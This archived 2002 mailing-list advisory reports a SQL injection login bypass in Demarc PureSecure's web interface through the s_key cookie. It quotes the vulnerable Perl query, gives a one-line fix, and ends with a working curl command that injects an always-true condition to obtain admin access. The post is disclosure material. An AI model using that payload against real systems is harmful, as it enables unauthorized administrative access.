OSEC

Neohapsis is currently accepting applications for employment. For more information, please visit our website www.neohapsis.com or email hr@neohapsis.com
 
From: pokleyzz sakamaniaka (pokleyzzhotmail.com)
Date: Mon Apr 15 2002 - 02:32:18 CDT

  • Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

    ('binary' encoding is not supported, stored as-is) Demarc PureSecure (http://www.demarc.org) is an
    all-inclusive network monitoring solution that allows
    you to monitor an entire network of servers from one
    powerful web interface.

    user can bypass login and get admin status by sql
    injection through cookies s_key

    --------- line 319 ------------------------------
    elsif (($cookies{'s_key'}) && ($cookies{'s_key'}-
    >value)){
            $logged_in_as = &check_login($cookies
    {'s_key'}->value);
            if (!$logged_in_as){
                       &print_login_screen;
                       &safe_exit;
            }
    -----------------------------------------------------

    s_key = will be use for sql in fuction check_login
    query ( line 6114)

    ---------lini 6114---------------------------------
    $sql_query = " SELECT \
                                            
            f1,f2,f3,admin,username,UNIX_TIMESTAMP
    (current_login_timedate) AS LOGINTIME \
                                    
            FROM \
                                            
            dm_sessions \
                                    
            WHERE current_session_id
    = '$session_id' ";
    -----------------------------------------------------

    -=solution=-
    line 6113: &safe_slash(\$session_id' );

    using curl (http://curl.haxx.se/download/):
    curl -b s_key=\'%20OR%20current_session_id%
    20like%20\'%\'%23 https:// host>/dm/demarc


    http://www.inetd-secure.net
    http://www.mybsd.org